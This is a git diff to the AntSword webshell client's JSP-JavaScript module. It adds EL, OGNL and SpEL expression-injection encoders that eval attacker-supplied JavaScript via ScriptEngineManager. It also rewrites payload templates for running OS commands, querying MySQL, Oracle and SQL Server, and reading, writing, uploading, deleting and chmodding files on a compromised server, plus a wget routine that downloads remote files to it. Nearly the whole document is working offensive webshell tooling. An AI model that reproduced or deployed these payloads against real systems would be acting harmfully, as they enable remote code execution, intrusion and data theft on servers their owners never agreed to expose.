diff --git a/source/core/jspjs/encoder/el.js b/source/core/jspjs/encoder/el.js new file mode 100644 index 00000000..d720d2eb --- /dev/null +++ b/source/core/jspjs/encoder/el.js @@ -0,0 +1,14 @@ +'use strict'; + +module.exports = (pwd, data, ext = null) => { + let randomID; + if (ext.opts.otherConf['use-random-variable'] === 1) { + randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']); + } else { + randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`; + } + data[pwd] = `\${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval(pageContext.request.getParameter("${randomID}"))}`; + data[randomID]=data['_']; + delete data['_']; + return data; +} diff --git a/source/core/jspjs/encoder/ognl.js b/source/core/jspjs/encoder/ognl.js new file mode 100644 index 00000000..d9748188 --- /dev/null +++ b/source/core/jspjs/encoder/ognl.js @@ -0,0 +1,7 @@ +'use strict'; + +module.exports = (pwd, data, ext = null) => { + data[pwd] = `(new javax.script.ScriptEngineManager()).getEngineByName("js").eval(new String(@com.sun.org.apache.xml.internal.security.utils.Base64@decode('${Buffer.from(data['_']).toString('base64')}')))`; + delete data['_']; + return data; +} diff --git a/source/core/jspjs/encoder/spelbase64.js b/source/core/jspjs/encoder/spelbase64.js new file mode 100644 index 00000000..ce4e2337 --- /dev/null +++ b/source/core/jspjs/encoder/spelbase64.js @@ -0,0 +1,7 @@ +'use strict'; + +module.exports = (pwd, data, ext = null) => { + data[pwd] = `T(javax.script.ScriptEngineManager).newInstance().getEngineByName("js").eval(new String(T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('${Buffer.from(data['_']).toString('base64')}')))`; + delete data['_']; + return data; +} diff --git a/source/core/jspjs/index.js b/source/core/jspjs/index.js index 4cc6a204..325a2e1e 100644 --- a/source/core/jspjs/index.js +++ b/source/core/jspjs/index.js @@ -41,7 +41,7 @@ class JSPJS extends Base { * @return {array} 编码器列表 */ get encoders() { - return []; + return ["spelbase64","el","ognl"]; } get decoders() { @@ -99,9 +99,6 @@ class JSPJS extends Base { var tag_s = "${tag_s.substr(0,tag_s.length/2)}"+"${tag_s.substr(tag_s.length/2)}"; var tag_e = "${tag_e.substr(0,tag_e.length/2)}"+"${tag_e.substr(tag_e.length/2)}"; try { - response.setContentType("text/html"); - request.setCharacterEncoding(cs); - response.setCharacterEncoding(cs); function decode(str) { str = str.substr(#randomPrefix#); var bt=Base64DecodeToByte(str); @@ -123,9 +120,12 @@ class JSPJS extends Base { } catch (e) { output.append("ERROR:// " + e.toString()); } + var result=tag_s + asenc(output.toString()) + tag_e; try { - response.getWriter().print(tag_s + asenc(output.toString()) + tag_e); - } catch (e) {} + response.getWriter().print(result); + } catch (e) { + result; + } `.replace(/\n\s+/g, '').replace(/#randomPrefix#/g, this.__opts__.otherConf["random-Prefix"]); // 使用编码器进行处理并返回 return this.encodeComplete(tag_s, tag_e, data); diff --git a/source/core/jspjs/template/command.js b/source/core/jspjs/template/command.js index 962ff8e8..b7894d5f 100644 --- a/source/core/jspjs/template/command.js +++ b/source/core/jspjs/template/command.js @@ -46,15 +46,12 @@ module.exports = (arg1, arg2, arg3) => ({ return osname.startsWith("win"); } - var cmdPath = decode(request.getParameter("${arg1}")); - var command = decode(request.getParameter("${arg2}")); - var envstr = decode(request.getParameter("${arg3}")); + var cmdPath = decode("#{newbase64::bin}"); + var command = decode("#{newbase64::cmd}"); + var envstr = decode("#{newbase64::env}"); output.append(ExecuteCommandCode(cmdPath, command, envstr)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::bin}", - [arg2]: "#{newbase64::cmd}", - [arg3]: "#{newbase64::env}", }, listcmd: { _: ` @@ -71,9 +68,8 @@ module.exports = (arg1, arg2, arg3) => ({ } return ret; } - var z1 = decode(request.getParameter("${arg1}")); + var z1 = decode("#{newbase64::binarr}"); output.append(ListcmdCode(z1)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::binarr}", }, }); diff --git a/source/core/jspjs/template/database/mysql.js b/source/core/jspjs/template/database/mysql.js index fec87866..1d315d29 100644 --- a/source/core/jspjs/template/database/mysql.js +++ b/source/core/jspjs/template/database/mysql.js @@ -47,12 +47,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); output.append(showDatabases(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::encode}", - [arg2]: "#{newbase64::conn}", }, show_tables: { _: ` @@ -92,14 +90,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); output.append(showTables(z1, z2, z3)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::encode}", - [arg2]: "#{newbase64::conn}", - [arg3]: "#{newbase64::db}", }, show_columns: { _: ` @@ -139,16 +134,12 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - var z4 = decode(request.getParameter("${arg4}")); + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); + var z4 = decode("#{newbase64::table}"); output.append(showColumns(z1, z2, z3, z4)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::encode}", - [arg2]: "#{newbase64::conn}", - [arg3]: "#{newbase64::db}", - [arg4]: "#{newbase64::table}", }, query: { _: ` @@ -213,13 +204,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ var rowsep = "\\r\\n"; return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::sql}"); output.append(query(z1, z2, z3)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::encode}", - [arg2]: "#{newbase64::conn}", - [arg3]: "#{newbase64::sql}", }, }); diff --git a/source/core/jspjs/template/database/oracle.js b/source/core/jspjs/template/database/oracle.js index 26fe9227..f460f1de 100644 --- a/source/core/jspjs/template/database/oracle.js +++ b/source/core/jspjs/template/database/oracle.js @@ -47,11 +47,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - output.append(showDatabases(z1, z2));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + output.append(showDatabases(z1, z2)); + `.replace(/\n\s+/g, ""), }, show_tables: { _: ` @@ -94,13 +93,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - output.append(showTables(z1, z2, z3));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::db}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); + output.append(showTables(z1, z2, z3)); + `.replace(/\n\s+/g, ""), }, show_columns: { _: `function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) { @@ -139,15 +136,12 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - var z4 = decode(request.getParameter("${arg4}")); - output.append(showColumns(z1, z2, z3, z4));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::db}', - [arg4]: '#{newbase64::table}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); + var z4 = decode("#{newbase64::table}"); + output.append(showColumns(z1, z2, z3, z4)); + `.replace(/\n\s+/g, ""), }, query: { _: ` @@ -214,13 +208,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ var rowsep = "\\r\\n"; return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - - output.append(query(z1, z2, z3));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::sql}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::sql}"); + output.append(query(z1, z2, z3)); + `.replace(/\n\s+/g, ""), } }) \ No newline at end of file diff --git a/source/core/jspjs/template/database/sqlserver.js b/source/core/jspjs/template/database/sqlserver.js index 8d69f6bf..3e685273 100644 --- a/source/core/jspjs/template/database/sqlserver.js +++ b/source/core/jspjs/template/database/sqlserver.js @@ -46,11 +46,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ var rowsep = ""; return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - output.append(showDatabases(z1, z2));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + output.append(showDatabases(z1, z2)); + `.replace(/\n\s+/g, ""), }, show_tables: { _: ` @@ -89,14 +88,11 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ var rowsep = ""; return executeSQL(encode, conn, sql, columnsep, rowsep, false); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - - output.append(showTables(z1, z2, z3));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::db}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); + output.append(showTables(z1, z2, z3)); + `.replace(/\n\s+/g, ""), }, show_columns: { _: `function executeSQL(encode, conn, sql, columnsep, rowsep, needcoluname) { @@ -134,15 +130,12 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ var sql = "SELECT TOP 1 * FROM " + dbname + "." + table; return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - var z4 = decode(request.getParameter("${arg4}")); - output.append(showColumns(z1, z2, z3, z4));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::db}', - [arg4]: '#{newbase64::table}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::db}"); + var z4 = decode("#{newbase64::table}"); + output.append(showColumns(z1, z2, z3, z4)); + `.replace(/\n\s+/g, ""), }, query: { _: ` @@ -210,13 +203,10 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({ return executeSQL(encode, conn, sql, columnsep, rowsep, true); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); - var z3 = decode(request.getParameter("${arg3}")); - - output.append(query(z1, z2, z3));`, - [arg1]: '#{newbase64::encode}', - [arg2]: '#{newbase64::conn}', - [arg3]: '#{newbase64::sql}' + var z1 = decode("#{newbase64::encode}"); + var z2 = decode("#{newbase64::conn}"); + var z3 = decode("#{newbase64::sql}"); + output.append(query(z1, z2, z3)); + `.replace(/\n\s+/g, ""), } }) \ No newline at end of file diff --git a/source/core/jspjs/template/filemanager.js b/source/core/jspjs/template/filemanager.js index 24e8505c..937c80f5 100644 --- a/source/core/jspjs/template/filemanager.js +++ b/source/core/jspjs/template/filemanager.js @@ -31,10 +31,9 @@ module.exports = (arg1, arg2, arg3) => ({ s += sF; return s; } - var dirPath=decode(request.getParameter("${arg1}")); + var dirPath=decode("#{newbase64::path}"); output.append(FileTreeCode(dirPath)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", }, delete: { @@ -53,10 +52,9 @@ module.exports = (arg1, arg2, arg3) => ({ return "1"; } - var fileOrDirPath = decode(request.getParameter("${arg1}")); + var fileOrDirPath = decode("#{newbase64::path}"); output.append(DeleteFileOrDirCode(fileOrDirPath)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", }, create_file: { @@ -87,13 +85,11 @@ module.exports = (arg1, arg2, arg3) => ({ return sb.toString(); } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{newbase64::content}"); output.append(WriteFileCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{newbase64::content}", }, read_file: { @@ -111,10 +107,9 @@ module.exports = (arg1, arg2, arg3) => ({ return s; } - var z1 = decode(request.getParameter("${arg1}")); + var z1 = decode("#{newbase64::path}"); output.append(ReadFileCode(z1)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", }, copy: { @@ -146,12 +141,10 @@ module.exports = (arg1, arg2, arg3) => ({ return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{newbase64::target}"); output.append(CopyFileOrDirCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{newbase64::target}", }, download_file: { @@ -169,10 +162,9 @@ module.exports = (arg1, arg2, arg3) => ({ os.close(); is.close(); } - var z1 = decode(request.getParameter("${arg1}")); + var z1 = decode("#{newbase64::path}"); output.append(DownloadFileCode(z1, response)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", }, upload_file: { @@ -191,12 +183,10 @@ module.exports = (arg1, arg2, arg3) => ({ os.close(); return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{buffer::content}"); output.append(UploadFileCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{buffer::content}", }, rename: { @@ -207,12 +197,10 @@ module.exports = (arg1, arg2, arg3) => ({ sf.renameTo(df); return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{newbase64::name}"); output.append(RenameFileOrDirCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{newbase64::name}", }, retime: { @@ -224,12 +212,10 @@ module.exports = (arg1, arg2, arg3) => ({ f.setLastModified(dt.getTime()); return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{newbase64::time}"); output.append(ModifyFileOrDirTimeCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{newbase64::time}", }, chmod: { @@ -271,11 +257,9 @@ module.exports = (arg1, arg2, arg3) => ({ } return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::path}"); + var z2 = decode("#{newbase64::mode}"); output.append(ChmodCode(z1, z2));`.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", - [arg2]: "#{newbase64::mode}", }, mkdir: { @@ -285,10 +269,9 @@ module.exports = (arg1, arg2, arg3) => ({ f.mkdir(); return "1"; } - var z1 = decode(request.getParameter("${arg1}")); + var z1 = decode("#{newbase64::path}"); output.append(CreateDirCode(z1)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::path}", }, wget: { @@ -308,11 +291,9 @@ module.exports = (arg1, arg2, arg3) => ({ h.disconnect(); return "1"; } - var z1 = decode(request.getParameter("${arg1}")); - var z2 = decode(request.getParameter("${arg2}")); + var z1 = decode("#{newbase64::url}"); + var z2 = decode("#{newbase64::path}"); output.append(WgetCode(z1, z2)); `.replace(/\n\s+/g, ""), - [arg1]: "#{newbase64::url}", - [arg2]: "#{newbase64::path}", }, });